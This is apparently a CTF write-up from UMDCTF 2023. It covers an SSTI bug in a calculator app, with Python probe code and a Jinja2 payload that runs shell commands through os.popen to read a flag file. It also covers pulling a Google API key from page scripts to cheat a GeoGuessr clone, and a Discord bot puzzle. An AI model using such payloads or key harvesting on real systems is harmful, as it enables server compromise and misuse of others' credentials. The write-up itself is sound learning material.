Together with members of the Hallios community and CyberSecMaverick, I participated in UMDCTF 2023.
The CTF theme was Pokémon, and I really liked the design and style of both the website and the challenges themselves.
We reached 86th place, which is a respectable position for this CTF.
I'll mainly share writeups of challenges I solved that I found interesting.
WEB - pop calc
The challenge provided a link to a web application:
Trying valid operations resulted in this HTTP request/response (I removed some of the request headers for the writeup):
Performing an invalid calculation resulted in an error that reflected the input:
I tried to understand the system behavior, tried various injections (sqli, ssti, etc.), sent fuzzed inputs and tried many different kinds of attacks unsuccessfully.
An SSTI (Server-Side Template Injection) vulnerability arises when a web application builds a template from user input instead of passing the input to the template as data. The template engine then parses the input itself, so an attacker who controls it can inject template directives that are executed on the server when the page is rendered.
I didn't find anything interesting (except for an internal server error).
I fell asleep and dreamt about sending some input that made the server return information about a service called 'pop' 🤷🏻‍♀️.
I woke up and thought about it for a bit. I looked at my SSTI payload and noticed that its syntax might be wrong.
I sent a different payload:
Now I was 100% sure it was an SSTI issue.
I checked HackTricks for payloads and tips and used an RCE payload to read the flag.
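The step that cost me a night's sleep above was a syntax mismatch: the input was reflected, but only the syntax of the engine actually in use gets evaluated. The following is an added example (not code from the challenge or from the CTF organizers) that sends the same arithmetic in several template syntaxes and tells "evaluated" apart from "reflected". The HTTP endpoint and parameter name in http_sender are assumptions, the fake_calc_server is a constructed stand-in for the calculator so the scan runs offline, and the Jinja2 read-flag payload assumes Jinja2 and a flag at flag.txt; neither is taken from the challenge.

```python
import re
import urllib.error
import urllib.parse
import urllib.request

# Arithmetic probes in the syntaxes of common template engines. 7*191 = 1337
# is used because the product is unlikely to appear in a page by accident.
PROBES = {
    "jinja2/twig": "{{7*191}}",
    "erb": "<%= 7*191 %>",
    "freemarker/velocity": "${7*191}",
    "smarty": "{7*191}",
}
EXPECTED = str(7 * 191)


def classify(probe, body):
    """Verdict for one probe: 'evaluated' if the engine computed it,
    'reflected' if the input came back untouched, 'absent' otherwise."""
    if probe in body:
        return "reflected"
    # Match 1337 only as a whole number, not as part of e.g. 11337.
    if re.search(rf"(?<!\d){EXPECTED}(?!\d)", body):
        return "evaluated"
    return "absent"


def scan(send):
    """send(payload) -> response body. Returns {engine: verdict}."""
    return {engine: classify(probe, send(probe)) for engine, probe in PROBES.items()}


def http_sender(url, param):
    """Build a send() that GETs url?param=<payload>. URL and parameter name
    are assumptions. A 500 response body is still read, because the error
    page is where the reflection (and the evaluated probe) shows up."""
    def send(payload):
        full = url + "?" + urllib.parse.urlencode({param: payload})
        try:
            with urllib.request.urlopen(full, timeout=10) as resp:
                return resp.read().decode("utf-8", "replace")
        except urllib.error.HTTPError as err:
            return err.read().decode("utf-8", "replace")
    return send


# Constructed stand-in for the challenge's calculator. Valid arithmetic is
# computed; anything else is embedded in an error message that is rendered
# by a Jinja2-style engine, so {{ ... }} blocks inside the input get evaluated.
_ARITH = r"[\d+\-*/ ()]+"


def fake_calc_server(expr):
    if re.fullmatch(_ARITH, expr):
        try:
            return str(eval(expr))  # input is already restricted to digits/operators
        except (SyntaxError, ZeroDivisionError):
            pass
    msg = "Invalid expression: " + expr
    return re.sub(r"\{\{\s*(" + _ARITH + r")\s*\}\}",
                  lambda m: str(eval(m.group(1))), msg)


# Once a syntax is confirmed, a payload of the kind listed on HackTricks
# reads a file through the engine's globals. Engine and flag path are assumed.
JINJA2_READ_FLAG = (
    "{{ self.__init__.__globals__.__builtins__.__import__('os')"
    ".popen('cat flag.txt').read() }}"
)


if __name__ == "__main__":
    for engine, verdict in scan(fake_calc_server).items():
        print(f"{engine:22} {verdict}")
```

Against a live target, replace fake_calc_server with http_sender("http://target/calc", "expr") (both values assumed). The verdict that matters is "evaluated" for exactly one syntax; a probe that comes back "reflected" rules out that engine rather than SSTI in general, which is the distinction I missed the first time.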
WEB - notsogeo
This challenge essentially asks us to cheat at GeoGuessr.
GeoGuessr is an online geography game that uses Google Street View to place players in random locations worldwide. Players must guess their location by examining the environment for clues and then placing a pin on a world map.
The challenge provides the source code of a version of this game.
Using the source code, we can look for a way to obtain our coordinates and place the pin on the correct location on the world map.
I entered the game.
The game source code:
From the challs.json file and the other files, it can be understood that these are the locations that will appear in the game.
We have to guess the correct coordinates to get the flag.
Each location consists of a 'pano' (the location ID) and its coordinates. However, we don't have access to the files themselves.
Going through the HTTP requests, I could not find the coordinates. However, I kept seeing a field called "panoid", which sounded like the location ID.
Searching Google for "Find coordinates by panoid" led me to this Google Street View documentation:
So we have the 'panoid' and need to find a Google Maps API key. Searching the source for the string "key=" turns up this:
Constructing the URL from the Google Street View documentation with the 'panoid' and 'key' values gives us the coordinates.
Using the coordinates, we select the correct location on the map and get the flag :)
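The two steps above (pull the API key out of the client-side script, then turn the panorama ID into coordinates through the Street View metadata endpoint) as an added example in Python. This is not the challenge's code or the game's code. The endpoint is the documented Street View Static API metadata URL; the sample script text, key and coordinates below are constructed for the example and do not come from the challenge.

```python
import json
import re
import urllib.parse
import urllib.request

METADATA_ENDPOINT = "https://maps.googleapis.com/maps/api/streetview/metadata"

# Google API keys are 39 characters starting with "AIza"; this matches them
# where a page embeds one as a "key=" query parameter in a script or URL.
KEY_RE = re.compile(r"key=(AIza[0-9A-Za-z_-]{35})")


def find_api_keys(text):
    """Distinct API keys found in HTML/JS text, in order of first appearance."""
    seen = []
    for key in KEY_RE.findall(text):
        if key not in seen:
            seen.append(key)
    return seen


def metadata_url(pano_id, key):
    """Metadata URL for one panorama ID (the documented 'pano' parameter)."""
    return METADATA_ENDPOINT + "?" + urllib.parse.urlencode({"pano": pano_id, "key": key})


def coords_from_metadata(body):
    """Parse a metadata response into (lat, lng). The API reports failures
    such as an unknown pano or a bad key in 'status', not as an HTTP error,
    so check it before trusting 'location'."""
    data = json.loads(body)
    if data.get("status") != "OK":
        raise ValueError(f"metadata lookup failed: {data.get('status')}")
    loc = data["location"]
    return float(loc["lat"]), float(loc["lng"])


def lookup(pano_id, key):
    """Live lookup; needs network access and a valid key."""
    with urllib.request.urlopen(metadata_url(pano_id, key), timeout=10) as resp:
        return coords_from_metadata(resp.read().decode("utf-8"))


# Constructed samples: a key embedded in a client-side script, and a metadata
# response in the documented shape. Key, pano ID and coordinates are made up.
FAKE_KEY = "AIza" + "SyExampleKey0123456789abcdefghijklm"
SAMPLE_JS = (
    'const loader = "https://maps.googleapis.com/maps/api/js?key='
    + FAKE_KEY + '&v=3";'
)
SAMPLE_METADATA = json.dumps({
    "date": "2021-06",
    "location": {"lat": 38.9869, "lng": -76.9426},
    "pano_id": "CONSTRUCTED_PANO_ID",
    "status": "OK",
})
SAMPLE_MISSING = json.dumps({"status": "ZERO_RESULTS"})


if __name__ == "__main__":
    key = find_api_keys(SAMPLE_JS)[0]
    print("key:", key)
    print("url:", metadata_url("CONSTRUCTED_PANO_ID", key))
    print("coords:", coords_from_metadata(SAMPLE_METADATA))
```

The key is a client-side key, so the request works from anywhere the key's referrer restrictions allow; in a CTF that is usually unrestricted, but a 'REQUEST_DENIED' status is the signal that it is not.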
MISC - ChungusBot v3
The Discord bot's source code is on GitHub.
Reading the source code, we can see that the flag is divided into four parts.
The first part asks us to send the URL in the code (which resolves to a GIF).
The second part of the flag is revealed after we guess the bot's random coin flips correctly.
The third part is revealed after we send four numbers that answer the following sentence.
The fourth part is revealed after we send a file that contains the text "You like jazz?" and is at least 100 characters long.
Now we have obtained all the flag parts :)